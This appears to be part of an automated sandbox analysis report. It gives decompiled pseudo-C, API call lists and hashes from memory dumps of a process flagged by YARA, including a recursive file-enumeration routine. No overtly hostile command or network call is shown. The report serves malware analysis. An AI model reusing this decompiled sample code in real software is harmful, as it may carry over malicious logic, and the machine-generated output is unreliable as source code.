                                                                      					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                                                      					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                                                      					_t18 = _t6;
                                                                      					if(_t18 != 0) {
                                                                      						E0040ACF0(_t18, _t19, _t12);
                                                                      					}
                                                                      					E00403E03(0);
                                                                      					FreeEnvironmentStringsW(_t19);
                                                                      				} else {
                                                                      					_t18 = 0;
                                                                      				}
                                                                      				return _t18;
                                                                      			}







                                                                      0x004055c5
                                                                      0x004055cf
                                                                      0x004055d3
                                                                      0x004055e4
                                                                      0x004055e8
                                                                      0x004055ed
                                                                      0x004055f3
                                                                      0x004055f8
                                                                      0x004055fd
                                                                      0x00405602
                                                                      0x00405609
                                                                      0x004055d5
                                                                      0x004055d5
                                                                      0x004055d5
                                                                      0x00405614

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free
                                                                      • String ID:
                                                                      • API String ID: 3328510275-0
                                                                      • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                      • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                      • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                      • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 029551A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 58cf8f00325b0e7218971c319787f8a19639d0bde1772335d4b019eb7dc9c8dc
                                                                      • Instruction ID: c9aa6e63d62463534aae4f8663bbd88f3513c9a5b5c5165b41758c9f00ee348d
                                                                      • Opcode Fuzzy Hash: 58cf8f00325b0e7218971c319787f8a19639d0bde1772335d4b019eb7dc9c8dc
                                                                      • Instruction Fuzzy Hash: 6351CDB1D00258DFDF14CFA9C884ADEBFB5BF88354F65862AE819AB210D7749845CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 029551A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: dc81add623d2a496e6cfb06a3fd99a9448fb4cf5814df9338b48ccf13d25f678
                                                                      • Instruction ID: 33ecdc79e2d00fedafe61141b7d1f14d762d495bb36c314eab2839fdcb885f9e
                                                                      • Opcode Fuzzy Hash: dc81add623d2a496e6cfb06a3fd99a9448fb4cf5814df9338b48ccf13d25f678
                                                                      • Instruction Fuzzy Hash: F541D0B0D00318DFDB14CF99C884ADEBFB5BF88314F65862AE819AB210D7749845CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 02957F09
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: 28efa37d37eef4e196a593da24bca9a28b35c5163945695d55f040398a6b545d
                                                                      • Instruction ID: 04160d55915cf6243d2183c974d206f2cd50a7930586aa774f875413b0ddd1ee
                                                                      • Opcode Fuzzy Hash: 28efa37d37eef4e196a593da24bca9a28b35c5163945695d55f040398a6b545d
                                                                      • Instruction Fuzzy Hash: 20412CB5A00355DFCB14CF95C488BAAFBF5FB88314F158899E819AB320C374A945CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 0295C212
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: ace4061b19504366441503a7a1a223b455361da00e1b3c531c19b856c4edb05b
                                                                      • Instruction ID: 92414fb738eb0473bb14c0efb4e21027fc936f2c13eee28166d0f08f79afa5d8
                                                                      • Opcode Fuzzy Hash: ace4061b19504366441503a7a1a223b455361da00e1b3c531c19b856c4edb05b
                                                                      • Instruction Fuzzy Hash: DA31F1B4A053898FDB10EFA9E84879E7FF4FB45718F24846AD888E7242D7795404CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02956BEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 005cdc01a5d22dbd684bc7b01c5ee9901137917ee1070a6dcb1f86ea1d87428e
                                                                      • Instruction ID: 76bb170303e04765313a7327404783ce98e9d52278c2e3d8aab66381247d2175
                                                                      • Opcode Fuzzy Hash: 005cdc01a5d22dbd684bc7b01c5ee9901137917ee1070a6dcb1f86ea1d87428e
                                                                      • Instruction Fuzzy Hash: 8F21E4B5900248EFDB10CFA9D984ADEFBF8EB48314F14841AE924A3310D374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02956BEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: cf2e99b3af02bbc490c9bac0aba96b8ba1ddcb218fcab2a427bcbfeea0a0ba66
                                                                      • Instruction ID: 374298ba4ae31948477d072c2f04621a632eba9e4a823ae1a66f786c6c55d18b
                                                                      • Opcode Fuzzy Hash: cf2e99b3af02bbc490c9bac0aba96b8ba1ddcb218fcab2a427bcbfeea0a0ba66
                                                                      • Instruction Fuzzy Hash: E321C4B5904258DFDB10CFA9D984ADEFBF8EB48354F14841AE914A7310D374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 0295C212
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: b398564f1f9239740a29d076ef57f340c5713994224be7da9b168f860542d12c
                                                                      • Instruction ID: 8db3d7f613704a44b28a8bfb1c8ff9ad0ffd65314e164f0ff0180b932d119c50
                                                                      • Opcode Fuzzy Hash: b398564f1f9239740a29d076ef57f340c5713994224be7da9b168f860542d12c
                                                                      • Instruction Fuzzy Hash: BF119AB1A013098FDB20DFA9C9487DEBFF4FB48754F20882AC818A7600C739A504CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02954116
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 9426ce0537d85ad86e8452e5ee45bd342ed58bde88f83f56bb262fcd36d3482b
                                                                      • Instruction ID: 68e5e8157d19007839283d3d2bd89eceae0d0d3e93346c932e0af68135d027c6
                                                                      • Opcode Fuzzy Hash: 9426ce0537d85ad86e8452e5ee45bd342ed58bde88f83f56bb262fcd36d3482b
                                                                      • Instruction Fuzzy Hash: 511102B5D042498FCB10CFAAC844BDEFBF4EB99318F15851AD829B7600C375A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02954116
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: a2a32fe6f4c77a25c476ea31d56cad4aed0f5ab487b86be1ede81554c68fcd92
                                                                      • Instruction ID: de8b6f3d5c19c10f6dcaf748d7398e3ca85e39b9933f97069e917973f4536c33
                                                                      • Opcode Fuzzy Hash: a2a32fe6f4c77a25c476ea31d56cad4aed0f5ab487b86be1ede81554c68fcd92
                                                                      • Instruction Fuzzy Hash: 1F1132B5D042598FCB10CFAAC848BDEFBF4EF89214F10856AD829B7600C374A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00403E3D(void* __ecx, long _a4) {
                                                                      				void* _t4;
                                                                      				void* _t6;
                                                                      				void* _t7;
                                                                      				long _t8;
                                                                      
                                                                      				_t7 = __ecx;
                                                                      				_t8 = _a4;
                                                                      				if(_t8 > 0xffffffe0) {
                                                                      					L7:
                                                                      					 *((intOrPtr*)(E00404831())) = 0xc;
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				if(_t8 == 0) {
                                                                      					_t8 = _t8 + 1;
                                                                      				}
                                                                      				while(1) {
                                                                      					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                                                      					if(_t4 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = E00403829();
                                                                      					if(__eflags == 0) {
                                                                      						goto L7;
                                                                      					}
                                                                      					_t6 = E004068FD(_t7, __eflags, _t8);
                                                                      					_pop(_t7);
                                                                      					__eflags = _t6;
                                                                      					if(_t6 == 0) {
                                                                      						goto L7;
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}







                                                                      0x00403e3d
                                                                      0x00403e43
                                                                      0x00403e49
                                                                      0x00403e7b
                                                                      0x00403e80
                                                                      0x00403e86
                                                                      0x00000000
                                                                      0x00403e86
                                                                      0x00403e4d
                                                                      0x00403e4f
                                                                      0x00403e4f
                                                                      0x00403e66
                                                                      0x00403e6f
                                                                      0x00403e77
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e57
                                                                      0x00403e59
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e5c
                                                                      0x00403e61
                                                                      0x00403e62
                                                                      0x00403e64
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e64
                                                                      0x00000000

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                      • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                      • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                      • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.587591854.0000000000ECD000.00000040.00000001.sdmp, Offset: 00ECD000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71bb482b5bbd27df914b4b4ba553220d660c271c7b2249030d6ae91d996d5bc4
                                                                      • Instruction ID: 10b5252940e8b646aa361b46e647e1d4e1d72a8aeea45583d465d75fa0f90af1
                                                                      • Opcode Fuzzy Hash: 71bb482b5bbd27df914b4b4ba553220d660c271c7b2249030d6ae91d996d5bc4
                                                                      • Instruction Fuzzy Hash: CA21B071508240AFCB15CF18DAC5F66BBA6EB84318F24C97DD94A5A246C337D847CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.587591854.0000000000ECD000.00000040.00000001.sdmp, Offset: 00ECD000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d512428b6244cfe09acb7713b3188d4452d78aaa87fb388020c040ffb7bcee5
                                                                      • Instruction ID: ddc13999f2706f9cf692bd571d225245ff9abdf93ec9dcd8b66d2bc44d600d12
                                                                      • Opcode Fuzzy Hash: 5d512428b6244cfe09acb7713b3188d4452d78aaa87fb388020c040ffb7bcee5
                                                                      • Instruction Fuzzy Hash: 12216D7550D3809FDB02CF24D990B15BF71AB46214F28C5EAD8498B697C33B980ACB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.587472046.0000000000EBD000.00000040.00000001.sdmp, Offset: 00EBD000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6a47dea879c3c3ba3a8fb6c2f2f3375524c0eae552cf0f14483d5236f64c465
                                                                      • Instruction ID: 0344f7175e3ab023bd516c7cfe6ec2f94fed3c0905fd9fc7b613db39960d2035
                                                                      • Opcode Fuzzy Hash: e6a47dea879c3c3ba3a8fb6c2f2f3375524c0eae552cf0f14483d5236f64c465
                                                                      • Instruction Fuzzy Hash: AB01806100E3C09FD7138B218C94752BFB4DF53224F1D81DBD9889F2A3C2695848C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.587472046.0000000000EBD000.00000040.00000001.sdmp, Offset: 00EBD000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 209dcc77666294893612cc4ed4c6ffcf50bb566ce39a52bddddb90cbc15ee4dd
                                                                      • Instruction ID: f52fe10a7364d1e1b956bf881d8b36293ed8645d75d077e2895d0169785d6387
                                                                      • Opcode Fuzzy Hash: 209dcc77666294893612cc4ed4c6ffcf50bb566ce39a52bddddb90cbc15ee4dd
                                                                      • Instruction Fuzzy Hash: 9C012B7040C344AAD7115E26CCC4BE7BB98EF55378F18C41AEE086B242D3799845DBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 72%
                                                                      			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                      				intOrPtr _v8;
                                                                      				signed int _v12;
                                                                      				intOrPtr _v28;
                                                                      				signed int _v32;
                                                                      				WCHAR* _v36;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v556;
                                                                      				intOrPtr _v558;
                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                      				intOrPtr* _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				intOrPtr _v644;
                                                                      				intOrPtr _v648;
                                                                      				void* __edi;
                                                                      				signed int _t40;
                                                                      				signed int _t45;
                                                                      				signed int _t48;
                                                                      				signed int _t50;
                                                                      				signed int _t51;
                                                                      				signed char _t53;
                                                                      				signed int _t62;
                                                                      				void* _t64;
                                                                      				union _FINDEX_INFO_LEVELS _t66;
                                                                      				union _FINDEX_INFO_LEVELS _t67;
                                                                      				signed int _t70;
                                                                      				intOrPtr* _t71;
                                                                      				signed int _t74;
                                                                      				void* _t80;
                                                                      				void* _t82;
                                                                      				signed int _t83;
                                                                      				void* _t87;
                                                                      				WCHAR* _t88;
                                                                      				intOrPtr* _t92;
                                                                      				intOrPtr _t95;
                                                                      				void* _t97;
                                                                      				signed int _t98;
                                                                      				intOrPtr* _t102;
                                                                      				signed int _t105;
                                                                      				void* _t108;
                                                                      				intOrPtr _t109;
                                                                      				void* _t110;
                                                                      				void* _t112;
                                                                      				void* _t113;
                                                                      				signed int _t115;
                                                                      				void* _t116;
                                                                      				union _FINDEX_INFO_LEVELS _t117;
                                                                      				void* _t121;
                                                                      				void* _t122;
                                                                      				void* _t123;
                                                                      				signed int _t124;
                                                                      				void* _t125;
                                                                      				signed int _t130;
                                                                      				void* _t131;
                                                                      				signed int _t132;
                                                                      				void* _t133;
                                                                      				void* _t134;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t92 = _a4;
                                                                      				_t2 = _t92 + 2; // 0x2
                                                                      				_t108 = _t2;
                                                                      				do {
                                                                      					_t40 =  *_t92;
                                                                      					_t92 = _t92 + 2;
                                                                      				} while (_t40 != 0);
                                                                      				_t115 = _a12;
                                                                      				_t95 = (_t92 - _t108 >> 1) + 1;
                                                                      				_v8 = _t95;
                                                                      				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
                                                                      					_t5 = _t115 + 1; // 0x1
                                                                      					_t87 = _t5 + _t95;
                                                                      					_t122 = E00403ECE(_t95, _t87, 2);
                                                                      					_t97 = _t121;
                                                                      					__eflags = _t115;
                                                                      					if(_t115 == 0) {
                                                                      						L6:
                                                                      						_push(_v8);
                                                                      						_t87 = _t87 - _t115;
                                                                      						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
                                                                      						_t132 = _t131 + 0x10;
                                                                      						__eflags = _t45;
                                                                      						if(__eflags != 0) {
                                                                      							goto L9;
                                                                      						} else {
                                                                      							_t80 = E00404CA2(_a16, __eflags, _t122);
                                                                      							E00403E03(0);
                                                                      							_t82 = _t80;
                                                                      							goto L8;
                                                                      						}
                                                                      					} else {
                                                                      						_push(_t115);
                                                                      						_t83 = E004047AD(_t97, _t122, _t87, _a8);
                                                                      						_t132 = _t131 + 0x10;
                                                                      						__eflags = _t83;
                                                                      						if(_t83 != 0) {
                                                                      							L9:
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							E00404649();
                                                                      							asm("int3");
                                                                      							_t130 = _t132;
                                                                      							_t133 = _t132 - 0x260;
                                                                      							_t48 =  *0x412014; // 0xfd571264
                                                                      							_v48 = _t48 ^ _t130;
                                                                      							_t109 = _v28;
                                                                      							_t98 = _v32;
                                                                      							_push(_t87);
                                                                      							_t88 = _v36;
                                                                      							_push(_t122);
                                                                      							_push(_t115);
                                                                      							_t123 = 0x5c;
                                                                      							_v644 = _t109;
                                                                      							_v648 = 0x2f;
                                                                      							_t116 = 0x3a;
                                                                      							while(1) {
                                                                      								__eflags = _t98 - _t88;
                                                                      								if(_t98 == _t88) {
                                                                      									break;
                                                                      								}
                                                                      								_t50 =  *_t98 & 0x0000ffff;
                                                                      								__eflags = _t50 - _v612;
                                                                      								if(_t50 != _v612) {
                                                                      									__eflags = _t50 - _t123;
                                                                      									if(_t50 != _t123) {
                                                                      										__eflags = _t50 - _t116;
                                                                      										if(_t50 != _t116) {
                                                                      											_t98 = _t98 - 2;
                                                                      											__eflags = _t98;
                                                                      											continue;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								break;
                                                                      							}
                                                                      							_t124 =  *_t98 & 0x0000ffff;
                                                                      							__eflags = _t124 - _t116;
                                                                      							if(_t124 != _t116) {
                                                                      								L19:
                                                                      								_t51 = _t124;
                                                                      								_t117 = 0;
                                                                      								_t110 = 0x2f;
                                                                      								__eflags = _t51 - _t110;
                                                                      								if(_t51 == _t110) {
                                                                      									L23:
                                                                      									_t53 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t112 = 0x5c;
                                                                      									__eflags = _t51 - _t112;
                                                                      									if(_t51 == _t112) {
                                                                      										goto L23;
                                                                      									} else {
                                                                      										_t113 = 0x3a;
                                                                      										__eflags = _t51 - _t113;
                                                                      										if(_t51 == _t113) {
                                                                      											goto L23;
                                                                      										} else {
                                                                      											_t53 = 0;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								_t101 = (_t98 - _t88 >> 1) + 1;
                                                                      								asm("sbb eax, eax");
                                                                      								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
                                                                      								E00402460(_t117,  &_v604, _t117, 0x250);
                                                                      								_t134 = _t133 + 0xc;
                                                                      								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
                                                                      								__eflags = _t125 - 0xffffffff;
                                                                      								if(_t125 != 0xffffffff) {
                                                                      									_t102 = _v608;
                                                                      									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
                                                                      									__eflags = _t62;
                                                                      									_v616 = _t62 >> 2;
                                                                      									_t64 = 0x2e;
                                                                      									do {
                                                                      										__eflags = _v604.cFileName - _t64;
                                                                      										if(_v604.cFileName != _t64) {
                                                                      											L36:
                                                                      											_push(_t102);
                                                                      											_t66 = E00404A29(_t102,  &(_v604.cFileName), _t88, _v612);
                                                                      											_t134 = _t134 + 0x10;
                                                                      											__eflags = _t66;
                                                                      											if(_t66 != 0) {
                                                                      												goto L26;
                                                                      											} else {
                                                                      												goto L37;
                                                                      											}
                                                                      										} else {
                                                                      											__eflags = _v558 - _t117;
                                                                      											if(_v558 == _t117) {
                                                                      												goto L37;
                                                                      											} else {
                                                                      												__eflags = _v558 - _t64;
                                                                      												if(_v558 != _t64) {
                                                                      													goto L36;
                                                                      												} else {
                                                                      													__eflags = _v556 - _t117;
                                                                      													if(_v556 == _t117) {
                                                                      														goto L37;
                                                                      													} else {
                                                                      														goto L36;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L40;
                                                                      										L37:
                                                                      										_t70 = FindNextFileW(_t125,  &_v604);
                                                                      										_t102 = _v608;
                                                                      										__eflags = _t70;
                                                                      										_t64 = 0x2e;
                                                                      									} while (_t70 != 0);
                                                                      									_t71 = _t102;
                                                                      									_t105 = _v616;
                                                                      									_t111 =  *_t71;
                                                                      									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
                                                                      									__eflags = _t105 - _t74;
                                                                      									if(_t105 != _t74) {
                                                                      										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
                                                                      									}
                                                                      								} else {
                                                                      									_push(_v608);
                                                                      									_t66 = E00404A29(_t101, _t88, _t117, _t117);
                                                                      									L26:
                                                                      									_t117 = _t66;
                                                                      								}
                                                                      								__eflags = _t125 - 0xffffffff;
                                                                      								if(_t125 != 0xffffffff) {
                                                                      									FindClose(_t125);
                                                                      								}
                                                                      								_t67 = _t117;
                                                                      							} else {
                                                                      								__eflags = _t98 -  &(_t88[1]);
                                                                      								if(_t98 ==  &(_t88[1])) {
                                                                      									goto L19;
                                                                      								} else {
                                                                      									_push(_t109);
                                                                      									_t67 = E00404A29(_t98, _t88, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							__eflags = _v12 ^ _t130;
                                                                      							E004018CC();
                                                                      							return _t67;
                                                                      						} else {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_t82 = 0xc;
                                                                      					L8:
                                                                      					return _t82;
                                                                      				}
                                                                      				L40:
                                                                      			}




























































                                                                      0x00404a2e
                                                                      0x00404a2f
                                                                      0x00404a36
                                                                      0x00404a36
                                                                      0x00404a39
                                                                      0x00404a39
                                                                      0x00404a3c
                                                                      0x00404a3f
                                                                      0x00404a44
                                                                      0x00404a4e
                                                                      0x00404a51
                                                                      0x00404a56
                                                                      0x00404a5e
                                                                      0x00404a61
                                                                      0x00404a6b
                                                                      0x00404a6e
                                                                      0x00404a6f
                                                                      0x00404a71
                                                                      0x00404a85
                                                                      0x00404a85
                                                                      0x00404a88
                                                                      0x00404a92
                                                                      0x00404a97
                                                                      0x00404a9a
                                                                      0x00404a9c
                                                                      0x00000000
                                                                      0x00404a9e
                                                                      0x00404aa2
                                                                      0x00404aab
                                                                      0x00404ab1
                                                                      0x00000000
                                                                      0x00404ab3
                                                                      0x00404a73
                                                                      0x00404a73
                                                                      0x00404a79
                                                                      0x00404a7e
                                                                      0x00404a81
                                                                      0x00404a83
                                                                      0x00404aba
                                                                      0x00404abc
                                                                      0x00404abd
                                                                      0x00404abe
                                                                      0x00404abf
                                                                      0x00404ac0
                                                                      0x00404ac1
                                                                      0x00404ac6
                                                                      0x00404aca
                                                                      0x00404acc
                                                                      0x00404ad2
                                                                      0x00404ad9
                                                                      0x00404adc
                                                                      0x00404adf
                                                                      0x00404ae2
                                                                      0x00404ae3
                                                                      0x00404ae6
                                                                      0x00404ae7
                                                                      0x00404aea
                                                                      0x00404aed
                                                                      0x00404af3
                                                                      0x00404afd
                                                                      0x00404b19
                                                                      0x00404b19
                                                                      0x00404b1b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404b00
                                                                      0x00404b03
                                                                      0x00404b0a
                                                                      0x00404b0c
                                                                      0x00404b0f
                                                                      0x00404b11
                                                                      0x00404b14
                                                                      0x00404b16
                                                                      0x00404b16
                                                                      0x00000000
                                                                      0x00404b16
                                                                      0x00404b14
                                                                      0x00404b0f
                                                                      0x00000000
                                                                      0x00404b0a
                                                                      0x00404b1d
                                                                      0x00404b20
                                                                      0x00404b23
                                                                      0x00404b3f
                                                                      0x00404b41
                                                                      0x00404b43
                                                                      0x00404b45
                                                                      0x00404b46
                                                                      0x00404b49
                                                                      0x00404b5f
                                                                      0x00404b61
                                                                      0x00404b61
                                                                      0x00404b4b
                                                                      0x00404b4d
                                                                      0x00404b4e
                                                                      0x00404b51
                                                                      0x00000000
                                                                      0x00404b53
                                                                      0x00404b55
                                                                      0x00404b56
                                                                      0x00404b59
                                                                      0x00000000
                                                                      0x00404b5b
                                                                      0x00404b5b
                                                                      0x00404b5b
                                                                      0x00404b59
                                                                      0x00404b51
                                                                      0x00404b69
                                                                      0x00404b71
                                                                      0x00404b75
                                                                      0x00404b83
                                                                      0x00404b88
                                                                      0x00404b9d
                                                                      0x00404b9f
                                                                      0x00404ba2
                                                                      0x00404bd7
                                                                      0x00404be2
                                                                      0x00404be2
                                                                      0x00404be7
                                                                      0x00404bed
                                                                      0x00404bee
                                                                      0x00404bee
                                                                      0x00404bf5
                                                                      0x00404c12
                                                                      0x00404c12
                                                                      0x00404c21
                                                                      0x00404c26
                                                                      0x00404c29
                                                                      0x00404c2b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404bf7
                                                                      0x00404bf7
                                                                      0x00404bfe
                                                                      0x00000000
                                                                      0x00404c00
                                                                      0x00404c00
                                                                      0x00404c07
                                                                      0x00000000
                                                                      0x00404c09
                                                                      0x00404c09
                                                                      0x00404c10
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404c10
                                                                      0x00404c07
                                                                      0x00404bfe
                                                                      0x00000000
                                                                      0x00404c2d
                                                                      0x00404c35
                                                                      0x00404c3b
                                                                      0x00404c41
                                                                      0x00404c45
                                                                      0x00404c45
                                                                      0x00404c48
                                                                      0x00404c4a
                                                                      0x00404c50
                                                                      0x00404c57
                                                                      0x00404c5a
                                                                      0x00404c5c
                                                                      0x00404c70
                                                                      0x00404c75
                                                                      0x00404ba4
                                                                      0x00404baa
                                                                      0x00404bae
                                                                      0x00404bb6
                                                                      0x00404bb6
                                                                      0x00404bb6
                                                                      0x00404bb8
                                                                      0x00404bbb
                                                                      0x00404bbe
                                                                      0x00404bbe
                                                                      0x00404bc4
                                                                      0x00404b25
                                                                      0x00404b28
                                                                      0x00404b2a
                                                                      0x00000000
                                                                      0x00404b2c
                                                                      0x00404b2c
                                                                      0x00404b32
                                                                      0x00404b37
                                                                      0x00404b2a
                                                                      0x00404bcb
                                                                      0x00404bce
                                                                      0x00404bd6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a83
                                                                      0x00404a58
                                                                      0x00404a5a
                                                                      0x00404ab4
                                                                      0x00404ab9
                                                                      0x00404ab9
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
